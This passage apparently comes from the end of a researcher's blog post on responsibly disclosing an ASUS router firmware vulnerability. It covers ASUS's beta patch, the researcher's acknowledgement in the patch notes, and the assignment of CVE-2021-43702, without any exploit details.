Shortly after sending the proof-of-concept video, I received an email from ASUS security requesting that I install a new beta patch for the router product. After I personally confirmed that ASUS had patched the vulnerability in the beta branch of the firmware, ASUS requested my information so I could be acknowledged in the patch notes of the firmware (Figure 1). The beta firmware was subsequently published as the latest firmware update for the affected products.

Figure 2 – Firmware Patch Notes Acknowledgement

**CVE Assignment**

A CVE was requested for this issue on November 11, 2021, which MITRE subsequently issued on March 28, 2022, as CVE-2021-43702. As of this writing, MITRE has not published further details, but I’ll update this article when more information becomes available.

Tag

#wifi